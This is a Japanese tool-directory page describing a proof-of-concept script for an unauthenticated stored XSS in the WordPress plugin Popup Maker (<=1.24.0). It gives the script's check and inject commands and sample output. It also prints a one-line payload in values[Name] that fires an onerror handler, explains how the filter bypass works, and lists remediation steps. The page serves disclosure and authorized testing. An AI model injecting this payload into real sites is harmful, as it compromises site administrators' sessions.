Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-87915-PoC-pwnVader — CVE-2026-87915 の Shell PoC。WordPress プラグイン Popup Maker (<=1.24.0) における未認証の蓄積型 XSS です。プラグインをフィンガープリントし、ペイロード注入を実演します。 | Kitploit
ツール/GitHubGitHub/pwnvader/cve-2026-87915-poc-pwnvader
脆弱性スキャナーウェブ脆弱性スキャナー脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテスト
GitHubpwnvader/cve-2026-87915-poc-pwnvader

CVE-2026-87915-PoC-pwnVader

CVE-2026-87915 の Shell PoC。WordPress プラグイン Popup Maker (<=1.24.0) における未認証の蓄積型 XSS です。プラグインをフィンガープリントし、ペイロード注入を実演します。

リポジトリを見る
14日前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-87915 — Popup Maker <= 1.24.0 — 未認証の蓄積型XSS (values[Name])

Author: pwnVader · License: MIT (リポジトリルート)

ComponentPopup Maker – Boost Sales, Conversions, Optins, Subscribers (WordPressプラグイン)
TypeCWE-79 — 蓄積型クロスサイトスクリプティング
Affected<= 1.24.0
Fixed1.25.0
CVECVE-2026-87915 — CVSS 3.1 7.2 (AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N)
PoCpoc.sh

概要

公開されているPopup Makerのオプトイン/ニュースレターフォームは、values[Name] パラメータを サニタイズせずに受け付けます (action=pum_sub_form)。この値はサーバー側に保存され、後に 管理画面の Subscribers 画面でレンダリングされます。出力時に適用される wp_kses() フィルタリングは このコンテキストでは不十分です。許可された属性値内のHTMLエンティティは正規化をすり抜け、 管理者がコンテキストヘルプタブのアンカーをクリックした際に wp-admin/js/common.js 内の jQuery( link.attr('href') ) DOMシンクによって評価されます。正味の影響: 管理者に対する 未認証の蓄積型XSS (管理者側での1クリックが必要)。

使用方法

root@kitploit:~
# Interactive menu
./poc.sh

# Read-only: fingerprint the plugin and detect a public subscribe form
./poc.sh check --target https://example.com

# Store the payload (writes ONE subscriber row; requires authorization)
./poc.sh inject --target https://example.com --authorized

inject はデフォルトで一意のテストメールアドレスを使用し、クリーンアップ手順 (管理UIまたは DELETE FROM wp_pum_subscribers WHERE email = '…';) を出力します。

出力例 (check)

root@kitploit:~
== CVE-2026-87915 PoC (check) ==
target: https://example.com

[1] Plugin fingerprint (read-only)
  [PASS] Popup Maker assets are served (plugin installed)
  [info] detected version: 1.22.0
  [PASS] version 1.22.0 is in the affected range (<= 1.24.0)

[2] Public subscribe form detection (read-only)
  [PASS] Popup Maker markup found on the site (a public form may accept values[Name])

出力例 (inject、ラボ環境)

root@kitploit:~
[3] Stored injection via pum_sub_form (writes one subscriber row)
  response: {"success":true,"data":{"message":"You have been subscribed!"}}
  [PASS] the server accepted and stored the payload unauthenticated

バイパス、一行で

root@kitploit:~
values[Name] = <a href="https://github.com/pwnvader/cve-2026-87915-poc-pwnvader/blob/main/%3Cimg%20src%3Dx%20onerror%3Dalert%28document.domain%29%3E">VDP-XSS-PROOF</a>
  • values[name] (小文字) は通常のフィールドです。大文字小文字が混在した values[Name] は PHPの配列キー正規化の際に衝突し、ペイロードを通過させます。
  • wp_kses() は <a href> 要素を許可します。属性内のエンティティエンコードされた `` は フィルタリングをすり抜け、後でデコード/正規化されます。
  • wp-admin/js/common.js は jQuery( link.attr('href') ) を評価し、これがデコードされたHTMLを パースして onerror ハンドラを発火させます。

修復

  • Popup Makerを 1.25.0 以降に更新してください (保存値に対して esc_html() + sanitize_text_field() を適用; classes/Admin/Subscribers/Table.php のベンダーチェンジセットを参照)。
  • 暫定措置: 公開購読者フォームを制限/無効化するか、WAFレベルで values[Name] をフィルタリングしてください。

参考資料

  • NVD — CVE-2026-87915: https://nvd.nist.gov/vuln/detail/CVE-2026-87915
  • ベンダー修正: Popup Maker 1.25.0 (プラグインTracチェンジセット 3690634)

免責事項

認可されたセキュリティテスト専用です。check は読み取り専用です。inject はテスト購読者行を 正確に1つ作成します — その後、出力されたクリーンアップコマンドで削除してください。

ツールをダウンロード